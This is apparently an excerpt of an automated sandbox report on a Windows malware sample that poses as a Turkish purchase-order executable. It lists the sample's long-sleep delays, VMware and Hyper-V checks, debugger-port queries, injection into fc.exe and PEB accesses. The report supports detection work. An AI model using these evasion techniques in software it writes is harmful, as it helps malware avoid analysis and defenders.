            Source: C:\Windows\SysWOW64\fc.exe TID: 7204Thread sleep time: -19070000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe TID: 5824Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe TID: 5824Thread sleep count: 42 > 30Jump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe TID: 5824Thread sleep time: -42000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe TID: 5824Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe TID: 5824Thread sleep time: -46500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003ABF60 FindFirstFileW,FindNextFileW,FindClose,9_2_003ABF60
            Source: firefox.exe, 0000000C.00000002.2447212608.000001D97B93C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1684331128.0000000000D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} CoF
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1684331128.0000000000D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: fc.exe, 00000009.00000002.4151524691.0000000000650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152197155.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_004176B3 LdrLoadDll,3_2_004176B3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197019F mov eax, dword ptr fs:[00000030h]3_2_0197019F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019AC188 mov eax, dword ptr fs:[00000030h]3_2_019AC188
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01930185 mov eax, dword ptr fs:[00000030h]3_2_01930185
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EA197 mov eax, dword ptr fs:[00000030h]3_2_018EA197
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01994180 mov eax, dword ptr fs:[00000030h]3_2_01994180
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196E1D0 mov eax, dword ptr fs:[00000030h]3_2_0196E1D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0196E1D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B61C3 mov eax, dword ptr fs:[00000030h]3_2_019B61C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019201F8 mov eax, dword ptr fs:[00000030h]3_2_019201F8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C61E5 mov eax, dword ptr fs:[00000030h]3_2_019C61E5
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199A118 mov ecx, dword ptr fs:[00000030h]3_2_0199A118
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199A118 mov eax, dword ptr fs:[00000030h]3_2_0199A118
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B0115 mov eax, dword ptr fs:[00000030h]3_2_019B0115
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E10E mov eax, dword ptr fs:[00000030h]3_2_0199E10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E10E mov ecx, dword ptr fs:[00000030h]3_2_0199E10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01920124 mov eax, dword ptr fs:[00000030h]3_2_01920124
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01988158 mov eax, dword ptr fs:[00000030h]3_2_01988158
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EC156 mov eax, dword ptr fs:[00000030h]3_2_018EC156
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F6154 mov eax, dword ptr fs:[00000030h]3_2_018F6154
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01984144 mov eax, dword ptr fs:[00000030h]3_2_01984144
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01984144 mov ecx, dword ptr fs:[00000030h]3_2_01984144
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4164 mov eax, dword ptr fs:[00000030h]3_2_019C4164
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F208A mov eax, dword ptr fs:[00000030h]3_2_018F208A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B60B8 mov eax, dword ptr fs:[00000030h]3_2_019B60B8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B60B8 mov ecx, dword ptr fs:[00000030h]3_2_019B60B8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E80A0 mov eax, dword ptr fs:[00000030h]3_2_018E80A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019880A8 mov eax, dword ptr fs:[00000030h]3_2_019880A8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019720DE mov eax, dword ptr fs:[00000030h]3_2_019720DE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019320F0 mov ecx, dword ptr fs:[00000030h]3_2_019320F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F80E9 mov eax, dword ptr fs:[00000030h]3_2_018F80E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EA0E3 mov ecx, dword ptr fs:[00000030h]3_2_018EA0E3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019760E0 mov eax, dword ptr fs:[00000030h]3_2_019760E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EC0F0 mov eax, dword ptr fs:[00000030h]3_2_018EC0F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190E016 mov eax, dword ptr fs:[00000030h]3_2_0190E016
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01974000 mov ecx, dword ptr fs:[00000030h]3_2_01974000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01992000 mov eax, dword ptr fs:[00000030h]3_2_01992000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01986030 mov eax, dword ptr fs:[00000030h]3_2_01986030
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EA020 mov eax, dword ptr fs:[00000030h]3_2_018EA020
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EC020 mov eax, dword ptr fs:[00000030h]3_2_018EC020
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01976050 mov eax, dword ptr fs:[00000030h]3_2_01976050
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F2050 mov eax, dword ptr fs:[00000030h]3_2_018F2050
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191C073 mov eax, dword ptr fs:[00000030h]3_2_0191C073
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EE388 mov eax, dword ptr fs:[00000030h]3_2_018EE388
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E8397 mov eax, dword ptr fs:[00000030h]3_2_018E8397
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E8397 mov eax, dword ptr fs:[00000030h]3_2_018E8397
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E8397 mov eax, dword ptr fs:[00000030h]3_2_018E8397
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191438F mov eax, dword ptr fs:[00000030h]3_2_0191438F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191438F mov eax, dword ptr fs:[00000030h]3_2_0191438F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E3DB mov eax, dword ptr fs:[00000030h]3_2_0199E3DB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E3DB mov eax, dword ptr fs:[00000030h]3_2_0199E3DB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E3DB mov ecx, dword ptr fs:[00000030h]3_2_0199E3DB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E3DB mov eax, dword ptr fs:[00000030h]3_2_0199E3DB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019943D4 mov eax, dword ptr fs:[00000030h]3_2_019943D4
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019943D4 mov eax, dword ptr fs:[00000030h]3_2_019943D4
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h]3_2_018FA3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h]3_2_018FA3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h]3_2_018FA3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h]3_2_018FA3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h]3_2_018FA3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h]3_2_018FA3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F83C0 mov eax, dword ptr fs:[00000030h]3_2_018F83C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F83C0 mov eax, dword ptr fs:[00000030h]3_2_018F83C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F83C0 mov eax, dword ptr fs:[00000030h]3_2_018F83C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F83C0 mov eax, dword ptr fs:[00000030h]3_2_018F83C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019AC3CD mov eax, dword ptr fs:[00000030h]3_2_019AC3CD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019763C0 mov eax, dword ptr fs:[00000030h]3_2_019763C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190E3F0 mov eax, dword ptr fs:[00000030h]3_2_0190E3F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190E3F0 mov eax, dword ptr fs:[00000030h]3_2_0190E3F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190E3F0 mov eax, dword ptr fs:[00000030h]3_2_0190E3F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019263FF mov eax, dword ptr fs:[00000030h]3_2_019263FF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h]3_2_019003E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h]3_2_019003E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h]3_2_019003E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h]3_2_019003E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h]3_2_019003E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h]3_2_019003E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h]3_2_019003E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h]3_2_019003E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01910310 mov ecx, dword ptr fs:[00000030h]3_2_01910310
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192A30B mov eax, dword ptr fs:[00000030h]3_2_0192A30B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192A30B mov eax, dword ptr fs:[00000030h]3_2_0192A30B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192A30B mov eax, dword ptr fs:[00000030h]3_2_0192A30B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EC310 mov ecx, dword ptr fs:[00000030h]3_2_018EC310
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C8324 mov eax, dword ptr fs:[00000030h]3_2_019C8324
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C8324 mov ecx, dword ptr fs:[00000030h]3_2_019C8324
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C8324 mov eax, dword ptr fs:[00000030h]3_2_019C8324
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C8324 mov eax, dword ptr fs:[00000030h]3_2_019C8324
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BA352 mov eax, dword ptr fs:[00000030h]3_2_019BA352
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01998350 mov ecx, dword ptr fs:[00000030h]3_2_01998350
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197035C mov eax, dword ptr fs:[00000030h]3_2_0197035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197035C mov eax, dword ptr fs:[00000030h]3_2_0197035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197035C mov eax, dword ptr fs:[00000030h]3_2_0197035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197035C mov ecx, dword ptr fs:[00000030h]3_2_0197035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197035C mov eax, dword ptr fs:[00000030h]3_2_0197035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197035C mov eax, dword ptr fs:[00000030h]3_2_0197035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C634F mov eax, dword ptr fs:[00000030h]3_2_019C634F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199437C mov eax, dword ptr fs:[00000030h]3_2_0199437C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01970283 mov eax, dword ptr fs:[00000030h]3_2_01970283
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01970283 mov eax, dword ptr fs:[00000030h]3_2_01970283
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01970283 mov eax, dword ptr fs:[00000030h]3_2_01970283
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E284 mov eax, dword ptr fs:[00000030h]3_2_0192E284
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E284 mov eax, dword ptr fs:[00000030h]3_2_0192E284
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019002A0 mov eax, dword ptr fs:[00000030h]3_2_019002A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019002A0 mov eax, dword ptr fs:[00000030h]3_2_019002A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019862A0 mov eax, dword ptr fs:[00000030h]3_2_019862A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019862A0 mov ecx, dword ptr fs:[00000030h]3_2_019862A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019862A0 mov eax, dword ptr fs:[00000030h]3_2_019862A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019862A0 mov eax, dword ptr fs:[00000030h]3_2_019862A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019862A0 mov eax, dword ptr fs:[00000030h]3_2_019862A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019862A0 mov eax, dword ptr fs:[00000030h]3_2_019862A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C62D6 mov eax, dword ptr fs:[00000030h]3_2_019C62D6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA2C3 mov eax, dword ptr fs:[00000030h]3_2_018FA2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA2C3 mov eax, dword ptr fs:[00000030h]3_2_018FA2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA2C3 mov eax, dword ptr fs:[00000030h]3_2_018FA2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA2C3 mov eax, dword ptr fs:[00000030h]3_2_018FA2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA2C3 mov eax, dword ptr fs:[00000030h]3_2_018FA2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019002E1 mov eax, dword ptr fs:[00000030h]3_2_019002E1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019002E1 mov eax, dword ptr fs:[00000030h]3_2_019002E1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019002E1 mov eax, dword ptr fs:[00000030h]3_2_019002E1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E823B mov eax, dword ptr fs:[00000030h]3_2_018E823B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C625D mov eax, dword ptr fs:[00000030h]3_2_019C625D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019AA250 mov eax, dword ptr fs:[00000030h]3_2_019AA250
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019AA250 mov eax, dword ptr fs:[00000030h]3_2_019AA250
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01978243 mov eax, dword ptr fs:[00000030h]3_2_01978243
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01978243 mov ecx, dword ptr fs:[00000030h]3_2_01978243
